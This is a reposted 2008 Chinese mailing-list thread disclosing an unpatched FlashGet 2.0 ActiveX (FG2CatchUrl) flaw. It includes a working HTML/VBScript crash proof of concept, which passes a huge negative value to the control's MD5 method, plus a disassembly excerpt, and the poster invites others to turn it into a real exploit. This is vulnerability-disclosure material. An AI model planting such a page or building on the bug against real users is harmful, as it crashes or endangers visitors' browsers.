又见0day! [FlashGet]-FG2CatchUrl Crash POC

以下消息来自幻影论坛[Ph4nt0m]邮件组
说实话flashget2.0一点也不好用
在ms拖win 2k3都拖了几天
最后一怒之下装了个1。7几的版本不到一个上午搞定
新版本既不稳定算法又差,让人难以接受

2008/4/23 remax < [email protected]>:
也就只能d.o.s了吧..

On 4月23日, 下午9时53分, "kook1991" < [email protected]> wrote:
> FlashGet 2.0 正式版的0day 早在2.0bate版就有这个BUG 当时发现了但是比较忙就扔下了
>
> 今天看见出正式版了 下载回来试了一下 软件更新 BUG犹在 于是乎把POC放出来
>
> <html>
> <title>[FlashGet]-FG2CatchUrl Crash POC (0Day)</title>
> <object classid="CLSID:FB5DA724-162B-11D3-8B9B-AA70B4B0B525" id="Vulnerable"></object>
> <script language='vbscript'>
> 'bug owner:kook1991
> Vulnerable.MD5 -99999999
> </script>
> </html>
>
> 036F9BE6    56              push    esi
> 036F9BE7    57              push    edi
> 036F9BE8    33C0            xor     eax, eax
> 036F9BEA    8D7D 13         lea     edi, dword ptr [ebp+13]
> 036F9BED    AA              stos    byte ptr es:[edi]
> 036F9BEE    8A81 BC377003   mov     al, byte ptr [ecx+37037BC]       ; ECX是传入的参数 没有经过处理
> 036F9BF4    6A FF           push    -1
> 036F9BF6    8845 12         mov     byte ptr [ebp+12], al
> 036F9BF9    8D45 12         lea     eax, dword ptr [ebp+12]
> 036F9BFC    50              push    eax
> 036F9BFD    E8 9980FFFF     call    036F1C9B
> 感觉没有办法利用 只能当掉浏览器 也许是本人技术有限 希望牛人们继续深入一下
>
> 注:幻影收发,转载请注明出处
>
> kook1991
>
> 2008-04-23
>
>  14.gif
> 2K查看下载

你可能感兴趣的:(职场,Crash,休闲,flashget,FG2CatchUrl)